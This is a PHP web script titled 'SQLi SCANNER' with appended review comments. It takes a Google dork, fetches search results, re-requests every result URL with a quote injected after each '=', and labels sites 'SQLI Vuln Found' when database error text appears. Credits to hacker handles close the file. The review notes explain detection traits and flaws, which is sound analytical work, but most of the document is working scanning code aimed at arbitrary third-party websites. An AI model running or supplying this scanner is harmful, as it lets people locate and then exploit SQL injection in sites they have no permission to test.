:: SQLi SCANNER ::

"; //google
// ---------------------------------------------------------------------------
// Review notes. The listing was collapsed onto a few lines; it is laid out
// here one statement per line with the code itself unchanged. The leading
// `";` closes a string that opens before this listing starts.
//
// What the script does: it takes a search query from $_POST['dork'], pages
// through results from a web-search JSON endpoint, re-requests every result
// URL with a single quote inserted after each '=', and labels the URL by
// whether the response body contains a database/PHP error fragment.
//
// Traits visible in this code that matter for detection and triage:
//   - the probe requests carry the literal User-Agent "$browser)" (see
//     cekvenurabel) and have "='" wherever the result URL had "=";
//   - the verdict depends entirely on error text appearing in the response
//     body, so an application that uses parameterized queries and does not
//     display database errors gives the check nothing to match;
//   - the only gate on the scan loop is the presence of $_POST['dork']; no
//     authentication or request-token check appears in this block, so anyone
//     who can reach the script can make the host send these requests.
// ---------------------------------------------------------------------------

/**
 * Push whatever has been echoed so far out to the client.
 *
 * Calls ob_flush() and then flush(); the main loop calls it after each probe.
 */
function letItBy() {
    ob_flush();
    flush();
}

// User-Agent header of the request that invoked this script. Nothing in this
// block reads the variable: cekvenurabel() passes a single-quoted literal
// instead and does not import $browser with `global`.
$browser = $_SERVER['HTTP_USER_AGENT'];

/**
 * Fetch one page of search results for $query.
 *
 * Requests rsz=8 results at offset $page * 8 and decodes the JSON reply into
 * an associative array.
 * NOTE(review): the URL is the legacy Google AJAX Search endpoint, which I
 * believe has been retired. Confirm before treating this path as live.
 *
 * @param string $query search expression; URL-encoded here
 * @param int    $page  page index, multiplied by the page size to get `start`
 * @return array|false  the `responseData.results` list, or false when
 *                      `responseStatus` is not '200' or the list is empty
 *
 * Ends the script with die() when the decoded reply has no `responseStatus`
 * key, which is also what happens when the fetch fails or the body is not JSON.
 */
function google_that($query, $page = 1) {
    $resultPerPage = 8;
    $start = $page * $resultPerPage;
    $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
    // Second argument true => http_get() sleeps one second before the request.
    $resultFromGoogle = json_decode(http_get($url, true), true);
    if (isset($resultFromGoogle['responseStatus'])) {
        if ($resultFromGoogle['responseStatus'] != '200') return false;
        if (sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
        else return $resultFromGoogle['responseData']['results'];
    } else die('The function ' . __FUNCTION__ . ' Kill me :(
' . $url);
}

/**
 * GET $url with cURL and return the response body.
 *
 * Sets a 10-second connect timeout, follows redirects and excludes response
 * headers from the returned string.
 *
 * @param string $url
 * @param bool   $safemode when strictly true, sleep one second first
 * @return string|bool whatever curl_exec() returns (the body, or false on failure)
 */
function http_get($url, $safemode = false) {
    if ($safemode === true) sleep(1);
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    // Never reached: it follows the return, and it is also called without a handle.
    curl_close();
}

/**
 * Request one URL with a quote inserted after every '=' and print a verdict.
 *
 * The altered URL is fetched with a 5-second timeout and the body is matched
 * case-insensitively against a list of MySQL/PHP error fragments. A match
 * prints the "Found" line, otherwise the "Not Vuln" line; output is flushed
 * either way.
 *
 * A match is an indicator only: alternatives such as "Syntax error" and
 * "Fatal error" also occur on pages that show unrelated errors.
 *
 * @param string $result URL taken from a search result
 * @return void
 */
function cekvenurabel($result) {
    // preg_replace() without a limit rewrites every '=' in the URL, not only the last.
    $url = preg_replace("/=/", "='", $result);
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_URL, $url);
    // Single quotes: the header value sent is the literal text $browser), not the variable.
    curl_setopt($curl, CURLOPT_USERAGENT, '$browser)');
    curl_setopt($curl, CURLOPT_TIMEOUT, '5');
    $GET = curl_exec($curl);
    // "()" and "*" are unescaped in the pattern, so they act as regex operators
    // rather than literal characters.
    // NOTE(review): one alternative carries an invisible character inside
    // "mysql_fetch_row" as it appears on this page, possibly an extraction
    // artifact. It is left untouched here.
    if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row ()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $GET)) {
        // $url comes from third-party search results and is echoed without HTML escaping.
        echo '
Found : ' . $url . ' <-- SQLI Vuln Found..
';
        ob_flush();
        flush();
    } else {
        echo '
' . $url . '<-- Not Vuln
';
        ob_flush();
        flush();
    }
    // $curl is not closed anywhere in this function.
    ob_flush();
    flush();
}

// Entry point: runs only when the posted 'dork' field has at least one
// character. The `{ 0 }` string offset is the curly-brace form that PHP 8 no
// longer parses.
if (isset($_POST['dork'] { 0 })) {
    // Walks up to 50 result pages and stops at the first page for which
    // google_that() returns false.
    for ($googlePage = 1;$googlePage <= 50;$googlePage++) {
        $googleResult = google_that($_POST['dork'], $googlePage);
        if (!$googleResult) {
            echo '
Finished scanning.
';
            break;
        }
        // One probe request per result URL, flushed to the page as it completes.
        for ($victim = 0;$victim < sizeof($googleResult);$victim++) {
            $result = $googleResult[$victim]['unescapedUrl'];
            cekvenurabel($result);
            letItBy();
        }
    }
} ?>
Google Dork:      
## Shout to ~>> | chud | pe4nk | edh0x | j121n | b412 | ## "; ?>